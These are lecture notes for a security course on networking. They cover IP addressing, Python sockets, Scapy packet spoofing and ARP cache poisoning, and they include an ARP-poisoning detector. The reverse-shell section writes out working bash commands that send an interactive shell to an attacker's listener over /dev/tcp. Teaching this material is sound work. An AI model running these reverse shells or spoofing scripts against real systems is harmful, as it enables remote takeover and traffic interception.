Lecture 9

Networking Basics and Attacks

Overview

  • This lecture covers networking basics, sniffing and spoofing techniques, ARP poisoning, the Heartbleed vulnerability, and reverse shells. The next lecture will cover firewalls, DNS attacks, and TCP/UDP attacks.

Outline

  • IP Address and Network Interface
  • TCP/IP Protocols
  • Packet Sniffing
  • Packet Spoofing
  • ARP Protocol and Attacks
  • Reverse Shells

IP Address

IP Address: The Original Scheme

  • Different classes of IP addresses:
    • Class A: From 0.0.0.0 to 127.255.255.255. First bit is 0.
    • Class B: From 128.0.0.0 to 191.255.255.255. First two bits are 10.
    • Class C: From 192.0.0.0 to 223.255.255.255. First three bits are 110.
    • Class D: From 224.0.0.0 to 239.255.255.255. First four bits are 1110. Used for multicast.
    • Class E: From 240.0.0.0 to 255.255.255.255. First four bits are 1111. Reserved for future use.

CIDR Scheme (Classless Inter-Domain Routing)

  • CIDR notation: 192.168.60.5/24 indicates that the first 24 bits are the network ID.
  • Question: What is the address range of the network 192.168.192.0/19?

Special IP Addresses

  • Private IP Addresses:
    • 10.0.0.0/8
    • 172.16.0.0/12
    • 192.168.0.0/16
  • Loopback Address:
    • 127.0.0.0/8
    • Commonly used: 127.0.0.1
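The classful rules, the CIDR question above and the private ranges, worked in code. This is an added example written for these notes, not part of the original slides; it does the bit arithmetic by hand rather than using the ipaddress module so the mask and network ID are visible.

```python
import socket
import struct

def ip_to_int(addr):
    """Dotted quad -> 32-bit integer (network byte order)."""
    return struct.unpack("!I", socket.inet_aton(addr))[0]

def int_to_ip(n):
    return socket.inet_ntoa(struct.pack("!I", n))

def classful_class(addr):
    """Class under the original scheme, decided by the leading bits of the first octet."""
    first = ip_to_int(addr) >> 24
    if first & 0x80 == 0x00: return "A"   # 0xxxxxxx
    if first & 0xC0 == 0x80: return "B"   # 10xxxxxx
    if first & 0xE0 == 0xC0: return "C"   # 110xxxxx
    if first & 0xF0 == 0xE0: return "D"   # 1110xxxx (multicast)
    return "E"                            # 1111xxxx (reserved)

def cidr_range(cidr):
    """Return (network address, broadcast address, number of addresses) for a CIDR block."""
    addr, prefix = cidr.split("/")
    prefix = int(prefix)
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF   # first `prefix` bits set
    network = ip_to_int(addr) & mask                    # network ID: host bits cleared
    broadcast = network | (~mask & 0xFFFFFFFF)          # host bits all set
    return int_to_ip(network), int_to_ip(broadcast), broadcast - network + 1

def is_private(addr):
    """True if addr falls in one of the three private blocks listed on the slide."""
    n = ip_to_int(addr)
    for block in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"):
        lo, hi, _ = cidr_range(block)
        if ip_to_int(lo) <= n <= ip_to_int(hi):
            return True
    return False

if __name__ == "__main__":
    print(cidr_range("192.168.192.0/19"))   # the question from the slide
    print(classful_class("172.16.0.1"), is_private("172.31.255.254"))
```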

List IP Address on Network Interface

  • Command: $ ip -br address
  • Example output:
    lo      UNKNOWN  127.0.0.1/8 ::1/128
    enp0s3  UP       10.0.5.5/24 fe80::bed8:53e2:5192:f265/64
    docker0 DOWN     172.17.0.1/16 fe80::42:13ff:fee7:90d6/64

Manually Assign IP Address

  • Commands:
    • $ sudo ip addr add 192.168.60.6/24 dev enp0s3
    • $ ip addr

Automatically Assign IP Address

  • DHCP: Dynamic Host Configuration Protocol

Get IP Addresses for Host Names: DNS

  • Command: $ dig www.example.com
  • The dig command queries DNS servers to obtain domain name information, such as IP addresses.

Network Stack

Packet Journey at a High Level

  • A packet travels from source A to destination B through multiple routers and networks.

How Packets Are Constructed

  • Application Layer: Data
  • Transport Layer: Adds TCP or UDP header.
  • Network Layer: Adds IP header.
  • MAC Layer: Adds MAC header. The NIC then transmits the frame over the network.

Layer 4: Transport Layer

  • Includes source port and destination port.
  • TCP or UDP header.

Layer 3: Network Layer

  • Constructs packet with source IP and destination IP addresses, then routes it.

Layer 2: Data Link Layer (MAC Layer)

  • Adds destination MAC address and source MAC address.

Sending Packet in Python (UDP Client)

  • Code:

```python
#!/usr/bin/python3
import socket

IP = "127.0.0.1"          # destination address
PORT = 9090               # destination port
data = b'Hello, World!'

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # UDP socket
sock.sendto(data, (IP, PORT))
```
  • Execution Results:

```
$ nc -luv 9090
Listening on [0.0.0.0] (family 0, port 9090)
Hello, World!
```

Receiving Packets in Python (UDP Server)

  • Code:

```python
#!/usr/bin/python3
import socket

IP = "0.0.0.0"            # listen on all interfaces
PORT = 9090

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # UDP socket
sock.bind((IP, PORT))
while True:
    data, (ip, port) = sock.recvfrom(1024)
    print("Sender: {} and Port: {}".format(ip, port))
    print("Received message: {}".format(data))
```
  • Example:
    • Terminal 1 sends "hello" and "hello again" to the server.
    • Terminal 2 (server) receives and prints the messages along with the sender's IP and port.

How Packets Are Received

  • Reverse process of sending; involves the NIC, MAC Layer, Network Layer (routing), Transport Layer (port), and finally the Application.

Routing

  • Routing Table

The ip route Command

  • Examples:
    • # ip route
    • # ip route get 10.9.0.1
    • # ip route get 192.168.60.5
    • # ip route get 1.2.3.4

Packet Sending Tools

  • Using netcat:
    • $ nc <ip> <port> (TCP packet)
    • $ nc -u <ip> <port> (UDP packet)
    • $ echo "data" > /dev/udp/<ip>/<port>
    • $ echo "data" > /dev/tcp/<ip>/<port>
  • Others: telnet, ping, etc.

Packet Sniffing

How Packets Are Received for Sniffing

  • Link-level driver copies packets to a ring buffer. Protocol stack and user space access the packets from there, enabling the capture of network traffic.

Packet Sniffing Tools

  • Tcpdump: Command-line tool, suitable for containers.
  • Wireshark: GUI tool, suitable for environments supporting a GUI.

Packet Spoofing

Overview

  • Normal packet construction: OS sets most header fields, users control a few.
  • Packet spoofing: Allows setting arbitrary header fields.

How To Spoof Packets

  • Manipulate packet headers at different layers (Application, Transport, Network, MAC) using tools like Scapy.

Spoofing ICMP Packets

  • Python code using Scapy:

```python
#!/usr/bin/python3
from scapy.all import *

print("SENDING SPOOFED ICMP PACKET . . . . . . . . . \n")
ip = IP(src="1.2.3.4", dst="93.184.216.34")   # IP layer with a spoofed source address
icmp = ICMP()                                 # ICMP layer (echo request by default)
pkt = ip/icmp
pkt.show()
send(pkt, verbose=0)                          # send at Layer 3
```

Spoofing UDP Packets

  • Python code using Scapy:

```python
#!/usr/bin/python3
from scapy.all import *

print("SENDING SPOOFED UDP PACKET . . . . . . . . . ")
ip = IP(src="1.2.3.4", dst="10.0.2.69")   # IP Layer
udp = UDP(sport=8888, dport=9090)         # UDP Layer
data = "Hello UDP!\n"                     # Payload
pkt = ip/udp/data
pkt.show()
send(pkt, verbose=0)                      # send at Layer 3
```

Other Uses of Scapy: Send and Receive

  • send(): Send packets at Layer 3.
  • sendp(): Send packets at Layer 2.
  • sr(): Sends packets at Layer 3 and receives answers.
  • srp(): Sends packets at Layer 2 and receives answers.
  • sr1(): Sends packets at Layer 3 and waits for the first answer.
  • srp1(): Sends packets at Layer 2 and waits for the first answer.
  • srloop(): Sends a packet at Layer 3 in a loop and prints the answer each time.
  • srploop(): Sends a packet at Layer 2 in a loop and prints the answer each time.

ARP Protocol and Attacks

Outline

  • Network Interface
  • Ethernet frame and MAC header
  • ARP protocol
  • ARP cache poisoning attack

Network Interface Card (NIC)

  • Physical or logical link between computer and network.
  • Each NIC has a MAC address.

Network Interface and Ethernet

  • Packet Flow: Link-level driver, ring buffer, protocol stack

Physical and Virtual NIC

  • Physical interface
  • Loopback/dummy interface
  • tun/tap interface

Examples of Virtual NIC

  • Loopback Interface
    • $ ifconfig lo
  • Dummy Interface (similar to loopback, but with its own IP)
    • $ ip link add dummy1 type dummy
    • $ ip addr add 1.2.3.4/24 dev dummy1
    • $ ip link set dummy1 up
    • $ ifconfig

Ethernet Frame & MAC Header

  • Destination MAC Address, Source MAC Address, Ether Type, Payload, Checksum
  • MAC Header or Ethernet Header: 14 bytes

Ethernet Frame Example

  • Details of an Ethernet frame, including source and destination MAC addresses, IP addresses, and protocol information.

Promiscuous Mode

  • Normal mode: NIC checks destination MAC address; accepts if it's its own, discards otherwise.
  • Promiscuous mode: NIC accepts all packets on the local network, regardless of destination MAC address. Useful for packet sniffing.

MAC Address Randomization and Privacy

  • iOS 8 introduced MAC address randomization to hide devices' true identities when searching for Wi-Fi networks.

The ARP Protocol

  • Communication on LAN requires MAC addresses, but often only IP address is known.
  • ARP: Address Resolution Protocol - finds MAC from IP.

ARP Request/Reply

  • ARP Request (broadcast): "who-has 10.9.0.7? tell 10.9.0.5"
  • ARP Reply: "10.9.0.7 is at 02:42:0a:09:00:07"

Send ARP Request: Example 1

  • Using ping and tcpdump to observe ARP requests and replies.

Send ARP Request: Example 2

  • Using ping and Wireshark to analyze ARP traffic.

ARP Message Format

  • Hardware Type, Protocol Type, MAC address length, IP address length, Sender MAC Address, Sender IP Address, Target MAC Address, Target IP Address.

Questions

  • Different behaviors of the following commands:
    1. ping 10.9.0.6 (existing, on LAN)
    2. ping 10.9.0.99 (non-existing, on LAN)
    3. ping 1.2.3.4 (non-existing, not on LAN)
    4. ping 8.8.8.8 (existing, on the Internet)

ARP Cache

  • Avoid sending too many ARP requests: ARP caches received information.
  • Command: $ arp -n

ARP Cache Poisoning Attack

  • Goal: Corrupt the ARP cache of a host to redirect traffic.

ARP Cache Poisoning

  • Spoof ARP Messages (Request, Reply, Gratuitous message).
  • Spoofed message gets cached by the victim.

Spoofing Gratuitous Message

  • Special type of ARP message.
  • Source IP = Destination IP.
  • Destination MAC = broadcast address (ff:ff:ff:ff:ff:ff).
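The ARP message format and the cache-poisoning idea, from the defender's side: an added example (not from the original slides) that decodes ARP frames field by field, learns the IP-to-MAC mapping from what it sees, and flags any IP that is re-announced with a different MAC, noting whether the message was a request, a reply, or a gratuitous ARP. The frames are constructed inline as test data; the second MAC claiming 10.9.0.7 is made up.

```python
import struct

# Ethernet header (14 bytes): dst MAC, src MAC, EtherType. ARP message (28 bytes): hw type,
# proto type, hw len, proto len, op, sender MAC, sender IP, target MAC, target IP.
ETH = struct.Struct("!6s6sH")
ARP = struct.Struct("!HHBBH6s4s6s4s")
ETHERTYPE_ARP, ARP_REQUEST, ARP_REPLY = 0x0806, 1, 2
BROADCAST = b"\xff" * 6
def fmt_mac(b): return ":".join(f"{x:02x}" for x in b)
def fmt_ip(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Decode the ARP fields of one Ethernet frame; None if it is not an ARP frame."""
    if len(frame) < ETH.size + ARP.size:
        return None
    dst, _src, etype = ETH.unpack_from(frame)
    if etype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, _tha, tpa = ARP.unpack_from(frame, ETH.size)
    return {"op": op, "sender_mac": fmt_mac(sha), "sender_ip": fmt_ip(spa),
            "target_ip": fmt_ip(tpa),
            # gratuitous: sender IP == target IP and the frame goes to the broadcast MAC
            "gratuitous": spa == tpa and dst == BROADCAST}

def detect_poisoning(frames):
    """Learn IP->MAC from ARP traffic; report any IP re-announced with a different MAC."""
    table, alerts = {}, []
    for frame in frames:
        a = parse_arp(frame)
        if a is None:
            continue
        known = table.setdefault(a["sender_ip"], a["sender_mac"])
        if known != a["sender_mac"]:
            kind = ("gratuitous ARP" if a["gratuitous"]
                    else "ARP reply" if a["op"] == ARP_REPLY else "ARP request")
            alerts.append(f"{a['sender_ip']} moved from {known} to {a['sender_mac']} via {kind}")
    return alerts

def make_frame(op, sha, spa, tha, tpa, eth_dst):
    """Build a constructed ARP frame (test data only, not captured traffic)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    ip = lambda s: bytes(int(x) for x in s.split("."))
    return ETH.pack(mac(eth_dst), mac(sha), ETHERTYPE_ARP) + \
           ARP.pack(1, 0x0800, 6, 4, op, mac(sha), ip(spa), mac(tha), ip(tpa))

# Constructed sample: the slide's legitimate reply "10.9.0.7 is at 02:42:0a:09:00:07", a normal
# request from 10.9.0.5, then a gratuitous ARP claiming 10.9.0.7 for a made-up MAC.
SAMPLE_FRAMES = [
    make_frame(ARP_REPLY, "02:42:0a:09:00:07", "10.9.0.7", "02:42:0a:09:00:05", "10.9.0.5", "02:42:0a:09:00:05"),
    make_frame(ARP_REQUEST, "02:42:0a:09:00:05", "10.9.0.5", "00:00:00:00:00:00", "10.9.0.7", "ff:ff:ff:ff:ff:ff"),
    make_frame(ARP_REQUEST, "02:42:0a:09:00:63", "10.9.0.7", "00:00:00:00:00:00", "10.9.0.7", "ff:ff:ff:ff:ff:ff"),
]
```

A legitimate change (a DHCP lease moving to another host, a replaced NIC) produces the same alert, so a real monitor needs entry ageing or an allow-list; this is the approach tools such as arpwatch take.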

Note: ARP Becomes "Stateful"

  • Example showing incomplete ARP entries.

Man-In-The-Middle Attack

  • Attacker intercepts and potentially alters communication between two parties.

Use ARP Cache Poisoning to Redirect Packets

  • Poison A’s ARP cache, so B’s IP is mapped to M’s MAC.
  • Poison B’s ARP cache, so A’s IP is mapped to M’s MAC.

Implication

  • Attacker machine can now receive packets sent from A to B and B to A.
  • Using sniffing and spoofing tools, attackers can perform numerous attacks.

Reverse Shell (Recall)

Overview

  • File descriptor
  • Standard input and output devices
  • Redirecting standard input and output
  • How reverse shell works

The Idea of Reverse Shell

  • Attacker gains shell access on the victim's machine by redirecting input/output streams.

File Descriptor

  • Example C code demonstrating file descriptor usage.

File Descriptor Table

  • Mapping of file descriptors to open files.

Standard I/O Devices

  • Standard input (0), standard output (1), standard error (2).

Redirection

  • Examples of redirecting input and output to files and file descriptors.

How Is Redirection Implemented?

  • Creates a copy of the file descriptor oldfd, and then assigns newfd as the new file descriptor.
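The oldfd/newfd copy above is the dup2() system call. As an added example (not the C code from the slides), the same mechanism in Python via os.dup2(): descriptor 1 is pointed at a file, then descriptor 2 at descriptor 1, which is exactly what the shell does for `cmd > file 2>&1`; the original descriptors are saved and restored so the caller's stdout and stderr survive.

```python
import os
import tempfile

def dup_onto(src_fd, dst_fd, action):
    """Run action() while dst_fd refers to the same open file as src_fd, then restore it.

    os.dup2(src_fd, dst_fd) makes dst_fd a copy of src_fd: afterwards anything written to
    dst_fd lands wherever src_fd points. The original dst_fd is saved with os.dup() first.
    """
    saved = os.dup(dst_fd)
    try:
        os.dup2(src_fd, dst_fd)
        return action()
    finally:
        os.dup2(saved, dst_fd)   # put the original descriptor back
        os.close(saved)

def capture_stdout_and_stderr(action):
    """Equivalent of `cmd > file 2>&1`: fd 1 -> file first, then fd 2 -> fd 1."""
    fd, path = tempfile.mkstemp()
    try:
        # Order matters, as in the shell: fd 2 copies fd 1 *after* fd 1 points at the file.
        dup_onto(fd, 1, lambda: dup_onto(1, 2, action))
        with open(path) as f:
            return f.read()
    finally:
        os.close(fd)
        os.unlink(path)

def demo():
    # os.write goes straight to the descriptor, with no Python-level buffering in between
    def action():
        os.write(1, b"to stdout\n")
        os.write(2, b"to stderr\n")
    return capture_stdout_and_stderr(action)

if __name__ == "__main__":
    print(repr(demo()))
```

Swapping the two dup_onto() calls reproduces the classic `2>&1 > file` mistake: fd 2 would copy the original terminal stdout and only the stdout line would reach the file.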

Redirecting Output to TCP Connections

  • C code example.

Redirecting Input to TCP Connections

  • C code example.

Redirecting to TCP from Shell

  • Redirecting Input and Output
  • Running a TCP server on 10.0.2.5: $ nc -l 9090

Note

  • /dev/tcp is not a real folder; it is a bash-specific virtual file/folder.
  • Redirection to /dev/tcp can only be done inside bash.

Reverse Shell Overview

  • Attacker machine listens for a connection, and the victim machine connects back, providing a shell.

Redirecting Standard Output

  • On Attacker Machine (10.0.2.70): $ nc -lv 9090
  • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090

Redirecting Standard Input & Output

  • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1

Redirecting Standard Error, Input, & Output

  • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1 2>&1

Reverse Shell via Code Injection

  • Reverse shell is executed via injected code.
  • Can’t assume that the target machine runs bash.
  • Run bash first.

Summary

  • Reverse shell works by redirecting shell program’s input/output.
  • Input and output of a program can be redirected to a TCP connection.
  • The other end of the TCP connection is the attacker.
  • It is a widely used technique by attackers.